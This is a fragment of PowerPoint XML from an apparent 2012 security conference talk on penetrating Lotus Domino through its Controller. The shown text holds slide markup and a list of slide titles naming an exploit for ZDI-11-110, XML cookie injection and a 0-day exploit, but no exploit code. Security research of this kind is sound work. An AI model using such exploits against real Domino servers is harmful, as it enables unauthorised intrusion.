          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="FA9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Scan and grab banners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detect version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6228184" y="2339588"/>
            <a:ext cx="2021707"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Pen-tester’s actions</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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96901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2188</TotalTime>
  <Words>2180</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Экран (4:3)</PresentationFormat>
  <Paragraphs>531</Paragraphs>
  <Slides>39</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39</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="40" baseType="lpstr">
      <vt:lpstr>Городская</vt:lpstr>
      <vt:lpstr>       Lotus Domino: Penetration Through the Controller  Alexey Sintsov</vt:lpstr>
      <vt:lpstr>#whoami</vt:lpstr>
      <vt:lpstr>What do pen-testers  do?</vt:lpstr>
      <vt:lpstr>Find vulns.</vt:lpstr>
      <vt:lpstr>Pen-tester env.</vt:lpstr>
      <vt:lpstr>Find vulns.</vt:lpstr>
      <vt:lpstr>Bug hunting?</vt:lpstr>
      <vt:lpstr>Target…</vt:lpstr>
      <vt:lpstr>Let’s see some real  stuff</vt:lpstr>
      <vt:lpstr>Lotus Domino 8.5.2FP2</vt:lpstr>
      <vt:lpstr>Lotus Domino 8.5.2FP2</vt:lpstr>
      <vt:lpstr>No fun…</vt:lpstr>
      <vt:lpstr>What do pen-testers  do?</vt:lpstr>
      <vt:lpstr>Lotus Domino 8.5.2FP2</vt:lpstr>
      <vt:lpstr>ZDI-11-110</vt:lpstr>
      <vt:lpstr>What is the protocol?</vt:lpstr>
      <vt:lpstr>Domino Controller</vt:lpstr>
      <vt:lpstr>Domino Controller</vt:lpstr>
      <vt:lpstr>Domino Controller</vt:lpstr>
      <vt:lpstr>verifyAppletUserCookie()</vt:lpstr>
      <vt:lpstr>verifyAppletUserCookie()</vt:lpstr>
      <vt:lpstr>Exploit for ZDI-11-110</vt:lpstr>
      <vt:lpstr>Mitigations…</vt:lpstr>
      <vt:lpstr>Pen-tester vs.  mitigations…</vt:lpstr>
      <vt:lpstr>Lotus Domino 8.5.3/ 8.5.2FP3</vt:lpstr>
      <vt:lpstr>Lotus Domino 8.5.3/ 8.5.2FP3</vt:lpstr>
      <vt:lpstr>Let’s see some real stuff</vt:lpstr>
      <vt:lpstr>And again…  verifyAppletUserCookie()</vt:lpstr>
      <vt:lpstr>XML?</vt:lpstr>
      <vt:lpstr>XML?</vt:lpstr>
      <vt:lpstr>XML?</vt:lpstr>
      <vt:lpstr>XML cookie Injection</vt:lpstr>
      <vt:lpstr>XML cookie Injection</vt:lpstr>
      <vt:lpstr>What about client’s cert?</vt:lpstr>
      <vt:lpstr>0-day exploit  (tested on 8.5.3)</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Internet/CyberWar/ APT/Booo!</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Domino: Penetration Through the Controller  Alexey Sintsov</dc:title>
  <dc:creator>Alexej</dc:creator>
  <cp:lastModifiedBy>Alexej</cp:lastModifiedBy>
  <cp:revision>173</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-02-26T13:35:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-03-30T12:21:57Z</dcterms:modified>
</cp:coreProperties>
</file>